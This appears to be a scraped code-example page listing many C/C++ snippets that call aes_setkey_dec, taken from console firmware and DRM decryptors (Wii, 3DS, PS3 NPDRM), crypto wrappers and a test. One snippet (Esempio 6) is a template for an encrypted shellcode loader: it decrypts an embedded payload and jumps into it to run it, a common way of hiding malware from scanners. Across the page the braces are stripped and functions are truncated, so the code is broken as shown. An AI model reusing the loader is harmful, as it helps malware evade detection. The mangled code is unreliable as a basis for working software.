Esempio n. 1
u8 *eid2_generate_block_buffer(u8 *eid2, u32 blocktype)
	u8 *res = NULL, indiv[INDIV_SIZE];
	aes_context aes_ctxt;

	//Generate individuals.
	indiv_gen(eid2_indiv_seed, NULL, NULL, NULL, indiv);

	eid2_header_t *h = (eid2_header_t *)eid2;

	//Fix header.

		res = (u8 *)malloc(h->p_len);
		aes_setkey_dec(&aes_ctxt, indiv + INDIV_EID2_KEY_OFFSET, 0x100);
		aes_crypt_cbc(&aes_ctxt, AES_DECRYPT, h->p_len, indiv + INDIV_EID2_IV_OFFSET, eid2 + sizeof(eid2_header_t), res);
		res = (u8 *)malloc(h->s_len);
		aes_setkey_dec(&aes_ctxt, indiv + INDIV_EID2_KEY_OFFSET, 0x100);
		aes_crypt_cbc(&aes_ctxt, AES_DECRYPT, h->s_len, indiv + INDIV_EID2_IV_OFFSET, eid2 + sizeof(eid2_header_t) + h->p_len, res);

	//Fix header.

	return res;
Esempio n. 2
void ctr_init_cbc_decrypt( ctr_aes_context* ctx,
						   u8 key[16],
						   u8 iv[16] )
	aes_setkey_dec(&ctx->aes, key, 128);
	ctr_set_iv(ctx, iv);
Esempio n. 3
int main()
  unsigned char key[16] = "123456789012344";
  const unsigned char input[16] = "hallozestien34";
  unsigned char output[16];
  unsigned char original_input[16];

  printf("%s\n", input);

  aes_context ctx;
  aes_setkey_enc(&ctx, key, 128);

  aes_crypt_ecb(&ctx, AES_ENCRYPT, input, output);

  unsigned char output_buf[1024];
  size_t baselen = 1024;

  base64_encode(output_buf, &baselen, output, 16);

  printf("%s\n", output_buf);

  aes_setkey_dec(&ctx, key, 128);
  aes_crypt_ecb(&ctx, AES_DECRYPT, output, original_input);

  printf("original input:\n%s\n", original_input);

  return 0;
Esempio n. 4
static int l_aes128decrypt_ecb(lua_State *L)
    //Check number of arguments
    int i;
    size_t size;
    const char *p_key = luaL_checklstring(L, 1, &size);
    if(size != 32)  return returnToLuaWithError(L,"Wrong size of key, got %d bytes, expected 32", (int) size);

    const char *p_encTxt = luaL_checklstring(L, 2, &size);

    unsigned char indata[16] = {0x00};
    unsigned char outdata[16] = {0x00};
    unsigned char aes_key[16] = {0x00};

    // convert key to bytearray and convert input to bytearray
    for (i = 0; i < 32; i += 2) {
        sscanf(&p_encTxt[i], "%02x", (unsigned int *)&indata[i / 2]);
        sscanf(&p_key[i], "%02x", (unsigned int *)&aes_key[i / 2]);
    aes_context ctx;
    aes_setkey_dec(&ctx, aes_key, 128);
    aes_crypt_ecb(&ctx, AES_DECRYPT, indata, outdata );

    //Push decrypted array as a string
    lua_pushlstring(L,(const char *)&outdata, sizeof(outdata));
    return 1;// return 1 to signal one return value
Esempio n. 5
cryAesDecrypt(const char *sKey, int iKeyLen,
                const char *sInBuf, int iInLen,
                     char *sOutBuf, int *piOutLen)
	unsigned char	sHash[48];
	unsigned char	*pIV = sHash + 32;
	aes_context		tCtx;

	if (iInLen % 16 || *piOutLen < iInLen) {
		return -1;

	*piOutLen = iInLen;

	sha4((const unsigned char *)sKey, iKeyLen, sHash, 1);

	aes_setkey_dec(&tCtx, sHash, 256);

	if (aes_crypt_cbc(&tCtx, DES_DECRYPT, iInLen, pIV,
		              (const unsigned char *)sInBuf,
		              (unsigned char *)sOutBuf) != 0) {
		return -2;

	return 0;
Esempio n. 6
int main(int argc, char **argv){
    unsigned char key[16];
    unsigned char iv[16] = %s;

    unsigned char input[] = %s;
    size_t input_len = %d;
    unsigned char output[%d];

    unsigned char passw[] = "%s";
    size_t in_len = %d;

    /* Generate a 128 bits key from the password */
    md5_context md5_ctx;
    md5_update(&md5_ctx, passw, in_len);
    md5_finish(&md5_ctx, key);

    /* Decrypt the payload */
    aes_context aes;
    aes_setkey_dec(&aes, key, 128);
    aes_crypt_cbc(&aes, AES_DECRYPT, input_len, iv, input, output);

    /* Execute decrypted shellcode */
    ((void (*)()) output)();
    return 0;
Esempio n. 7
        AES_CBCFrame_Context *  inContext, 
        const uint8_t           inKey[ kAES_CBCFrame_Size ], 
        const uint8_t           inIV[ kAES_CBCFrame_Size ], 
        Boolean                 inEncrypt )
    OSStatus        err;
    inContext->cryptor = NULL;
    err = CCCryptorCreate( inEncrypt ? kCCEncrypt : kCCDecrypt, kCCAlgorithmAES128, 0, inKey, kAES_CTR_Size, 
        NULL, &inContext->cryptor );
    check_noerr( err );
    if( err ) return( err );
    if( inEncrypt ) aes_encrypt_key128( inKey, &inContext->ctx.encrypt );
    else            aes_decrypt_key128( inKey, &inContext->ctx.decrypt );
    inContext->encrypt = inEncrypt;
    if( inEncrypt ) aes_setkey_enc( &inContext->ctx, (unsigned char *) inKey, kAES_CBCFrame_Size * 8 );
    else            aes_setkey_dec( &inContext->ctx, (unsigned char *) inKey, kAES_CBCFrame_Size * 8 );
    inContext->encrypt = inEncrypt;
    if( inEncrypt ) AES_set_encrypt_key( inKey, kAES_CBCFrame_Size * 8, &inContext->key );
    else            AES_set_decrypt_key( inKey, kAES_CBCFrame_Size * 8, &inContext->key );
    inContext->mode = inEncrypt ? AES_ENCRYPT : AES_DECRYPT;
    memcpy( inContext->iv, inIV, kAES_CBCFrame_Size );
    return( kNoErr );
Esempio n. 8
struct obj_str *aes_decrypt(UCHAR * cipher, int cipherlen, UCHAR * iv,
			    char *key, int keylen)
	UCHAR plaintext[AES_MSG_SIZE];
	aes_context aes_ctx;
	struct obj_str *plain = NULL;

	if (cipherlen % AES_BLOCK_SIZE != 0) {
		return NULL;

	/* Setup AES context with the key and the IV */
	aes_key_setup(digest, iv, key, keylen);
	if (aes_setkey_dec(&aes_ctx, digest, 256) != 0) {
		return NULL;

	/* Decrypt message */
	memset(plaintext, '\0', AES_MSG_SIZE);
	if (aes_crypt_cbc
	    (&aes_ctx, AES_DECRYPT, cipherlen, iv, cipher, plaintext) != 0) {
		return NULL;
	plain = str_init(plaintext, cipherlen);

	/* The decrypted message may be bigger than the original message, but
	 * the bencode parser can handle that. */
	return plain;
Esempio n. 9
	설명 : AES 복호화 함수
	입력 : 
			fp			: Bin파일 포인터	
			pData		: Bin파일 데이터
			nHeaderSize	: 헤더사이즈
BOOL cAESFile::AESDecryptData(FILE* fp, char* pData, DWORD dwDataSize, DWORD dwType)
	if(fp == NULL)		{	return FALSE;	}
	if(pData == NULL)	{	return FALSE;	}

	int n, keylen;
	int filesize, offset;
	char *p;
	char crc, crc1, crc2;
	unsigned char key[512];
	unsigned char buffer[1024];
	aes_context aes_ctx;

	filesize = dwDataSize;

	fread( &crc1, sizeof(char), 1, fp );		// crc1

	// 키값 생성
	p = (char*)m_aCurKey;
	keylen = 0;
	memset( key, 0, sizeof( key ) );
	while( sscanf( p, "%02X", &n ) > 0 &&
		keylen < (int) sizeof( key ) )
		key[keylen++] = (unsigned char) n;
		p += 2;

	aes_setkey_dec( &aes_ctx, key, 256 );

	crc = (char)dwType;
	// 불럭단위로 데이터를 복호화하여 메모리에 저장한다.
	for( offset = 0; offset < filesize; offset += 16 )
		if( fread( buffer, 1, 16, fp ) != 16 )
			MessageBox( NULL, _T( "fread Error!!" ), _T( "Error!!" ), MB_OK );
			memset( buffer, 0, sizeof( buffer ) );
			memset( &aes_ctx, 0, sizeof(  aes_context ) );
			return FALSE;		
		aes_crypt_ecb( &aes_ctx, AES_DECRYPT, buffer, buffer );

		for(int i=0; i<16; i++)
			pData[offset+i] = buffer[i];
			crc = crc + pData[offset+i];

	fread( &crc2, sizeof(char), 1, fp );		// crc2
	if((crc1 != crc2) || (crc1 != crc))
		MessageBox( NULL, _T( "CheckCrc Error!!" ), _T( "Error!!" ), MB_OK );
		memset( buffer, 0, sizeof( buffer ) );
		memset( &aes_ctx, 0, sizeof(  aes_context ) );
		return FALSE;
	return TRUE;
Esempio n. 10
File: ctr.c Progetto: atupac/ctr
void ctr_init_cbc_decrypt( ctr_crypto_context* ctx,
						   unsigned char key[16],
						   unsigned char iv[16] )
	aes_setkey_dec(&ctx->aes, key, 128);
	ctr_set_iv(ctx, iv);
Esempio n. 11
// AES Encryption / Decryption - ECB Blocks
int AESCryptECB_Blocks( uint8 *key, uint8 keyLen, uint8 mode, uint8 nBlocks, uint8 *in, uint8 *out )
   int i;
   aes_context aes_ctx;

   if( mode == AES_ENCRYPT )
      aes_setkey_enc(&aes_ctx, key, keyLen*8); //PolarSSL takes key length in bits
   else if( mode == AES_DECRYPT )
      aes_setkey_dec(&aes_ctx, key, keyLen*8); //PolarSSL takes key length in bits
      return (FAIL);

   for( i = 0; i < nBlocks; i++)
      if ( aes_crypt_ecb(&aes_ctx, mode, in, out) != aes_pass )
         return (FAIL);
      out += AES_BLOCK_SIZE;
      in += AES_BLOCK_SIZE;
   return ( PASS );
Esempio n. 12
// AES Encryption / Decryption - ECB
int AESCryptECB( uint8 *key, uint8 keyLen, uint8 mode, uint8 *in, uint8 *out )
   int ret;
   aes_context aes_ctx;

   if( mode == AES_ENCRYPT )
      aes_setkey_enc(&aes_ctx, key, keyLen*8);  //PolarSSL takes key length in bits
      if ( (ret = aes_crypt_ecb (&aes_ctx, AES_ENCRYPT, in, out)) != aes_pass )
         return (FAIL);
   else if ( mode == AES_DECRYPT )
      aes_setkey_dec(&aes_ctx, key, keyLen*8);  //PolarSSL takes key length in bits
      if ( (aes_crypt_ecb (&aes_ctx, AES_DECRYPT, in, out)) != aes_pass )
         return (FAIL);
      return ( FAIL );
   return (PASS);
Esempio n. 13
// AES Encryption / Decryption - CBC
int AESCryptCBC( uint8 *key, uint8 keyLen, uint8 mode, uint8 *iv, uint8 inLen, uint8 *in, uint8 *out )
   aes_context aes_ctx;
   int ret;

   if(inLen % 16)
      proj_printf("ERROR: Length is incorrect");
      return inLen;

   if ( mode == AES_ENCRYPT )
      aes_setkey_enc(&aes_ctx, key, keyLen*8); //PolarSSL takes key length in bits
      if ( ( ret = aes_crypt_cbc(&aes_ctx, mode, inLen, iv, in, out) ) != aes_pass )
         return ( FAIL );
   else if ( mode == AES_DECRYPT )
      aes_setkey_dec(&aes_ctx, key, keyLen*8); //PolarSSL takes key length in bits
      if ( (aes_crypt_cbc (&aes_ctx, mode, inLen, iv, in, out)) != aes_pass )
         return (FAIL);
      return ( FAIL );
   return ( PASS );
Esempio n. 14
void CNANDContentLoader::AESDecode(u8* _pKey, u8* _IV, u8* _pSrc, u32 _Size, u8* _pDest)
	aes_context AES_ctx;

	aes_setkey_dec(&AES_ctx, _pKey, 128);
	aes_crypt_cbc(&AES_ctx, AES_DECRYPT, _Size, _IV, _pSrc, _pDest);
fz_newaesdfilter(fz_filter **fp, unsigned char *key, unsigned keylen)
    FZ_NEWFILTER(fz_aesd, f, aesdfilter);
    aes_setkey_dec(&f->aes, key, keylen * 8);
    f->ivcount = 0;
    return fz_okay;
Esempio n. 16
uint8_t *decryptFirmTitle(uint8_t *title, unsigned int size, uint8_t key[16])
	uint8_t iv[0x10] = {0};
	aes_context aes_ctxt;
	aes_setkey_dec(&aes_ctxt, &key[0], 0x80);
	aes_crypt_cbc(&aes_ctxt, AES_DECRYPT, size, iv, title, title);
	return decryptFirmTitleNcch(title, size);
Esempio n. 17
fz_filter *
fz_newaesdfilter(unsigned char *key, unsigned keylen)
	FZ_NEWFILTER(fz_aesd, f, aesdfilter);
	aes_setkey_dec(&f->aes, key, keylen * 8);
	f->ivcount = 0;
	return (fz_filter *)f;
Esempio n. 18
  SparkProtocol::received_message(unsigned char *buf, int length)
  unsigned char next_iv[16];
  memcpy(next_iv, buf, 16);

  aes_setkey_dec(&aes, key, 128);
  aes_crypt_cbc(&aes, AES_DECRYPT, length, iv_receive, buf, buf);

  memcpy(iv_receive, next_iv, 16);

  char path = buf[ 5 + (buf[0] & 0x0F) ];

  switch (CoAP::code(buf))
    case CoAPCode::GET:
      switch (path)
        case 'v': return CoAPMessageType::VARIABLE_REQUEST;
        case 'd': return CoAPMessageType::DESCRIBE;
        default: break;
      } break;
    case CoAPCode::POST:
      switch (path)
        case 'E':
        case 'e':
          return CoAPMessageType::EVENT;
        case 'h': return CoAPMessageType::HELLO;
        case 'f': return CoAPMessageType::FUNCTION_CALL;
        case 's': return CoAPMessageType::SAVE_BEGIN;
        case 'u': return CoAPMessageType::UPDATE_BEGIN;
        case 'c': return CoAPMessageType::CHUNK;
        default: break;
      } break;
    case CoAPCode::PUT:
      switch (path)
        case 'k': return CoAPMessageType::KEY_CHANGE;
        case 'u': return CoAPMessageType::UPDATE_DONE;
        case 's':
          if (buf[8]) return CoAPMessageType::SIGNAL_START;
          else return CoAPMessageType::SIGNAL_STOP;
        default: break;
      } break;
    case CoAPCode::EMPTY:
      switch (CoAP::type(buf))
        case CoAPType::CON: return CoAPMessageType::PING;
        default: return CoAPMessageType::EMPTY_ACK;
      } break;
    case CoAPCode::CONTENT:
      return CoAPMessageType::TIME;
  return CoAPMessageType::ERROR;
Esempio n. 19
uint8_t *decryptFirmTitle(uint8_t *title, size_t size, size_t *firmSize, uint8_t key[16])
	aes_context aes_ctxt;

	uint8_t iv[16] = { 0 };
	aes_setkey_dec(&aes_ctxt, &key[0], 0x80);
	aes_crypt_cbc(&aes_ctxt, AES_DECRYPT, size, iv, title, title);
	return decryptFirmTitleNcch(title, firmSize);
Esempio n. 20
u8* decryptFirmTitle(u8* title, unsigned int size, unsigned int tid){
	u8 key[0x10] = {0};
	u8 iv[0x10] = {0};
	GetTitleKey(&key[0], 0x00040138, tid);
	aes_context aes_ctxt;
	aes_setkey_dec(&aes_ctxt, &key[0], 0x80);
	aes_crypt_cbc(&aes_ctxt, AES_DECRYPT, size, iv, title, title);
	return decryptFirmTitleNcch(title, size);
Esempio n. 21
void eid3_decrypt_buffer(u8 *eid3)
	u8 indiv[INDIV_SIZE];
	u8 key[0x10], iv[0x10];
	aes_context aes_ctxt;

	//Generate individuals.
	indiv_gen(eid3_indiv_seed, NULL, NULL, NULL, indiv);

	//Generate key.
	memset(iv, 0, 0x10);
	aes_setkey_enc(&aes_ctxt, indiv + 0x20, 0x100);
	aes_crypt_cbc(&aes_ctxt, AES_ENCRYPT, 0x10, iv, eid3_keyseed, key);

	//Calculate eid3 aes omac1.
	u8 digest[AES_OMAC1_DIGEST_SIZE];
	aes_omac1(digest, eid3, 0xF0, key, 0x80);

    _hexdump(stdout,"",0,(u8*)eid3 + 0xF0,AES_OMAC1_DIGEST_SIZE,0);

	if(memcmp(digest, eid3 + 0xF0, AES_OMAC1_DIGEST_SIZE) != 0)
		printf("warning: eid3 omac1 hash check failed!\n");

	//Decrypt eid3.
	aes_setkey_dec(&aes_ctxt, key, 0x80);
	memcpy(iv, eid3 + 0x10, 0x10);
	aes_crypt_cbc(&aes_ctxt, AES_DECRYPT, 0xD0, iv, eid3 + 0x20, eid3 + 0x20);

	//Decrypt second layer.
	memset(iv, 0, 0x10);
	aes_setkey_dec(&aes_ctxt, eid3_static_key, 0x80);
	aes_crypt_cbc(&aes_ctxt, AES_DECRYPT, 0xD0, iv, eid3 + 0x20, eid3 + 0x20);

	u8 sha1_digest[20];
	sha1(eid3 + 0x20, 0xB8, sha1_digest);

    _hexdump(stdout,"",0,(u8*)eid3 + 0x20 + 0xB8,20,0);

	if(memcmp(sha1_digest, eid3 + 0x20 + 0xB8, 20) != 0)
		printf("warning: eid3 sha1 hash check failed!\n");
Esempio n. 22
bool CVolumeWiiCrypted::ChangePartition(u64 offset)
	m_VolumeOffset = offset;
	m_LastDecryptedBlockOffset = -1;

	u8 volume_key[16];
	DiscIO::VolumeKeyForParition(*m_pReader, offset, volume_key);
	aes_setkey_dec(m_AES_ctx.get(), volume_key, 128);
	return true;
Esempio n. 23
BOOL __stdcall np_decrypt_npdrm(sce_buffer_ctxt_t *ctxt)
	aes_context aes_ctxt;
	keyset_t *ks_np_klic_free, *ks_klic_key;
	u8 npdrm_key[0x10];
	u8 npdrm_iv[0x10];
	ci_data_npdrm_t *np;

	if((np = _sce_find_ci_npdrm(ctxt)) == NULL)
		return FALSE;

	//Try to find keysets.
	ks_klic_key = keyset_find_by_name(CONFIG_NP_KLIC_KEY_KNAME);
	if(ks_klic_key == NULL)
		return FALSE;
	if(_klicensee_key != NULL)
		memcpy(npdrm_key, _klicensee_key, 0x10);
	else if(np->license_type == NP_LICENSE_FREE)
		ks_np_klic_free = keyset_find_by_name(CONFIG_NP_KLIC_FREE_KNAME);
		if(ks_np_klic_free == NULL)
			return FALSE;
		memcpy(npdrm_key, ks_np_klic_free->erk, 0x10);
	else if(np->license_type == NP_LICENSE_LOCAL)
		if ((klicensee_by_content_id((s8 *)np->content_id, npdrm_key)) == FALSE)
			return FALSE;
		return FALSE;

	aes_setkey_dec(&aes_ctxt, ks_klic_key->erk, METADATA_INFO_KEYBITS);
	aes_crypt_ecb(&aes_ctxt, AES_DECRYPT, npdrm_key, npdrm_key);

	memset(npdrm_iv, 0, 0x10);
	aes_setkey_dec(&aes_ctxt, npdrm_key, METADATA_INFO_KEYBITS);
	aes_crypt_cbc(&aes_ctxt, AES_DECRYPT, sizeof(metadata_info_t), npdrm_iv, (u8 *)ctxt->metai, (u8 *)ctxt->metai);

	return TRUE;
CVolumeWiiCrypted::CVolumeWiiCrypted(std::unique_ptr<IBlobReader> reader, u64 _VolumeOffset,
									 const unsigned char* _pVolumeKey)
	: m_pReader(std::move(reader)),
	m_AES_ctx(new aes_context),
	aes_setkey_dec(m_AES_ctx.get(), _pVolumeKey, 128);
	m_pBuffer = new u8[s_block_total_size];
Esempio n. 25
CVolumeWiiCrypted::CVolumeWiiCrypted(IBlobReader* _pReader, u64 _VolumeOffset,
									 const unsigned char* _pVolumeKey)
	: m_pReader(_pReader),
	m_AES_ctx(new aes_context),
	aes_setkey_dec(m_AES_ctx.get(), _pVolumeKey, 128);
	m_pBuffer = new u8[0x8000];
u8 PWS_ReadSlot (u8 Slot_u8, typePasswordSafeSlot_st * Slot_st)
u8* ReadPointer_pu8;

u8* AesKeyPointer_pu8;

    if (PWS_SLOT_COUNT <= Slot_u8)
        CI_LocalPrintf ("PWS_ReadSlot: Wrong slot nr %d\r\n", Slot_u8);
        return (FALSE);

    if (FALSE == PWS_GetDecryptedPasswordSafeKey (&AesKeyPointer_pu8))
        CI_LocalPrintf ("PWS_ReadSlot: key not decrypted\r\n");
        return (FALSE); // Aes key is not decrypted

    // LED_GreenOn ();

    // Get read address
    ReadPointer_pu8 = (u8 *) (PWS_FLASH_START_ADDRESS + (PWS_SLOT_LENGTH * Slot_u8));
    memcpy (Slot_st, ReadPointer_pu8, PWS_SLOT_LENGTH);

       #ifdef ENABLE_IBN_PWS_TESTS_ENCRYPTION CI_LocalPrintf ("PWS_ReadSlot encrypted : "); HexPrint (PWS_SLOT_LENGTH, Slot_st); CI_LocalPrintf
       ("\n\r"); #endif */

    // Decrypt data (max 256 byte per encryption)
unsigned char Slot_st_decrypted[PWS_SLOT_LENGTH];

aes_context aes_ctx;

    aes_setkey_dec (&aes_ctx, AesKeyPointer_pu8, 256);
    // TODO: Create aes_crypt_ecb with length as parameter and break the
    // input internally
int i;

    for (i = 0; i < PWS_SLOT_LENGTH; i += 16)
        aes_crypt_ecb (&aes_ctx, AES_DECRYPT, &(((unsigned char *) (Slot_st))[i]), &(Slot_st_decrypted[i]));

    memcpy ((unsigned char *) (Slot_st), Slot_st_decrypted, PWS_SLOT_LENGTH);

       #ifdef ENABLE_IBN_PWS_TESTS_ENCRYPTION CI_LocalPrintf ("PWS_ReadSlot decrypted : "); HexPrint (PWS_SLOT_LENGTH, Slot_st_decrypted);
       CI_LocalPrintf ("\n\r"); #endif */
    // LED_GreenOff ();

    return (TRUE);
Esempio n. 27
void CryptState_genKey(cryptState_t *cs) {
	RAND_bytes(cs->raw_key, AES_BLOCK_SIZE);
	RAND_bytes(cs->encrypt_iv, AES_BLOCK_SIZE);
	RAND_bytes(cs->decrypt_iv, AES_BLOCK_SIZE);
	AES_set_encrypt_key(cs->raw_key, 128, &cs->encrypt_key);
	AES_set_decrypt_key(cs->raw_key, 128, &cs->decrypt_key);
	aes_setkey_enc(&cs->aes_enc, cs->raw_key, 128);
	aes_setkey_dec(&cs->aes_dec, cs->raw_key, 128);
	cs->bInit = true;
Esempio n. 28
TEST_FIXTURE(AESFixture, SuccessfullyDecryptsOpenSSLExample)
  unsigned char buf[32];
  memcpy(buf, ciphertext, 32);

  unsigned char iv[16];
  memcpy(iv, credentials + 16, 16);

  aes_context ctx;
  aes_setkey_dec(&ctx, credentials, 128);
  aes_crypt_cbc(&ctx, AES_DECRYPT, 32, iv, buf, buf);

  CHECK_ARRAY_EQUAL(plaintext, buf, 32);
Esempio n. 29
void CryptState_setKey(cryptState_t *cs, const unsigned char *rkey, const unsigned char *eiv, const unsigned char *div)
	memcpy(cs->raw_key, rkey, AES_BLOCK_SIZE);
	memcpy(cs->encrypt_iv, eiv, AES_BLOCK_SIZE);
	memcpy(cs->decrypt_iv, div, AES_BLOCK_SIZE);
	AES_set_encrypt_key(cs->decrypt_iv, 128, &cs->encrypt_key);
	AES_set_decrypt_key(cs->raw_key, 128, &cs->decrypt_key);
	aes_setkey_enc(&cs->aes_enc, cs->decrypt_iv, 128);
	aes_setkey_dec(&cs->aes_dec, cs->raw_key, 128);
	cs->bInit = true;
Esempio n. 30
int decrypt_with_klic(sce_info_t *sce_info) {
	npdrm_info_t *npdrm_info = npdrm_adjust_endianness_control_flag(sce_info);
	if (!npdrm_info) {
		return 0;

	keyset_t *np_keyset = find_keyset_by_name("NP_klic_key");
	if (!np_keyset) {
		return 0;

	uint8_t klic[16];
	uint8_t iv[16];
	aes_context aes_ctx;

	if (klicensee) {
		memcpy(klic, klicensee, 16);
	} else if (npdrm_info->license_type == NPDRM_LICENSETYPE_FREE) {
        	keyset_t *klic_free = find_keyset_by_name("NP_klic_free");
		if (!klic_free) {
			return 0;
		memcpy(klic, klic_free->erk_key, 16);
	} else if (npdrm_info->license_type == NPDRM_LICENSETYPE_LOCAL) {
		if (!decrypt_klicensee(npdrm_info->content_id, klic))
			return 0;
	} else {
		return 0;
	aes_setkey_dec(&aes_ctx, np_keyset->erk_key, np_keyset->erk_len * 8);
	aes_crypt_ecb(&aes_ctx, AES_DECRYPT, klic, klic);
	aes_setkey_dec(&aes_ctx, klic, 128);
	memset(iv, 0, sizeof(iv));
	aes_crypt_cbc(&aes_ctx, AES_DECRYPT, sizeof(metadata_t), iv, (uint8_t *) sce_info->metadata_aes_keys, (uint8_t *) sce_info->metadata_aes_keys);
	return 1;